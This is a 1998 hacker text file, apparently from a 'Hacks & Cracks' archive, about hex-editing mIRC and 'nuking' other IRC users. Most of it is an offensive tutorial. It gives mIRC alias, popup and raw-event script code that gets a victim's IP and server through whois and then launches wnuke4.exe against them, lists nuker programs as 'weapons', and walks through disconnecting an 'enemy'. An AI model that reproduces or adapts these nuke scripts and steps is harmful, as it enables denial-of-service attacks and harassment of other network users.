home *** CD-ROM | disk | FTP | other *** search
/ Hacks & Cracks / Hacks_and_Cracks.iso / hackersclub / km / library / hack / hexedit.txt < prev    next >
Text File  |  1998-03-25  |  3KB  |  103 lines

  1.           //------------------------------------------------\\
  2.           ||  How to Hexedit mIRC - Flood Protection/Nuking ||
  3.           ||   By: Lord Somer(webmaster@lordsomer.com)      ||
  4.           ||                                                ||
  5.           ||              The Hackers Layer                 ||
  6.           ||           http://www.lordsomer.com             ||
  7.           ||                                    ||
  8.           \\------------------------------------------------//
  9.  
  10.  
  11. Flood Protection 
  12. 1.Get Rid of Version/User Floods 
  13.   Using a hex editor open mIRC.exe. 
  14.   Search for Reply. 
  15.   Find where the replies are. 
  16.   Simply delete all the replys, except for the ping reply. 
  17.  
  18.  
  19. How to Nuke
  20.  
  21. There are several ways and versions of nukes but the most common is the simple wnuke nuke. 
  22. It just disconnects the user from the server, so that's what a connection reset by peer 
  23. means! I'll cover the wnukes first then the other types of nukes
  24.  
  25. The 2 types of WNukes 
  26. 1.WNUKE 4 From a Popup Nuke 
  27.   Download WNUKE4.EXE 
  28.   Add these pieces of coding to the appropriate portions of mIRC. 
  29.  
  30.         [POPUPS/NICK NAMES LIST]
  31.         NUKE!:/mn $1 $2 $3 $4 $5 $6 $7
  32.  
  33.         [ALIASES]
  34.         mn {
  35.         .nuke $$1 
  36.         timer 1 3 /nuke $$2 
  37.         timer 1 6 /nuke $$3 
  38.         timer 1 9 /nuke $$4 
  39.         timer 1 12 /nuke $$5 
  40.         timer 1 15 /nuke $$6 
  41.         timer 1 18 /nuke $$7 
  42.         }
  43.         /nuke {
  44.         enable #nuke
  45.         set %nuke.nick $1
  46.         stats L $1
  47.         whois $1
  48.         timer 1 2 /src
  49.         }
  50.         [RAW]
  51.         #nuke disabled
  52.         311:*: set %nukeip $parm4 | halt
  53.         312:*: set %nukeserver $parm3 | halt
  54.         301:*: halt
  55.         313:*: halt
  56.         319:*: halt
  57.         317:*: halt
  58.         318:*: run $mircdir $+ \wnuke4.exe -n %nukeserver %nukeip 0 1200-3500 %nukeport | .disable #nuke | echo 6 Nuking %nukeip on %nukeserver %nukeport $+ . | halt
  59.         #nuke end
  60.                         
  61.  
  62. 2.WNewk Via a Seperate Program 
  63.  
  64. 1.Pick Your Weapon 
  65.   1.wnuke.exe 
  66.   2.wnuke2.exe 
  67.   3.wnuke4.exe RECOMMENDED 
  68.   4.dccnewk.exe 
  69.   5.pnewq97o.exe 
  70.   6.snuke.exe 
  71.   7.wnewk.exe 
  72.   8.wnewk-x.exe 
  73.   9.wnewk-x2.exe RECOMMENDED 
  74.  
  75. 2.The below options refer to a bit of code and here it is:
  76.  
  77.       [POPUPS/NICKNAMES LIST]
  78.        Nuke
  79.        .DNS:/dns *1
  80.        .Run Nuker:/run $mircdir $+ utils\nukers\wnewk-x2.exe
  81.        .Whois:/whois *1
  82.                       
  83.  
  84.       This is based on the fact your nuker is in a sub-dir of utils called nukers. 
  85. 3.Run Your weapon of choice in this case wnewk-x2.exe or of course increase your 
  86.   script by adding in the bit of code. 
  87.  
  88. 4.Now do a /dns on the enemy or you could add the bit of code to your script. 
  89.  
  90. 5.Now do a /whois on the enemy or you could add the bit of code to your script. 
  91.  
  92. 6.Look in your status window, highlight the outputted ip address and server
  93.   of your victim and hit crtl+c(seperate copy for each, these are placed in the config more 
  94.   info in next step). 
  95.  
  96. 7.Configure the script: 
  97.   Server: paste the server from the status window here 
  98.   Destination address: paste the ip of the victim from the status window here. 
  99.  
  100.   Hit engage newk and watch in the channel for a:CONNECTION RESET BY PEER 
  101.   If it dosen't work increase the rang of ports, do a /links and pick a different 
  102.   server to try going through, or try a different unreach to use. 
  103.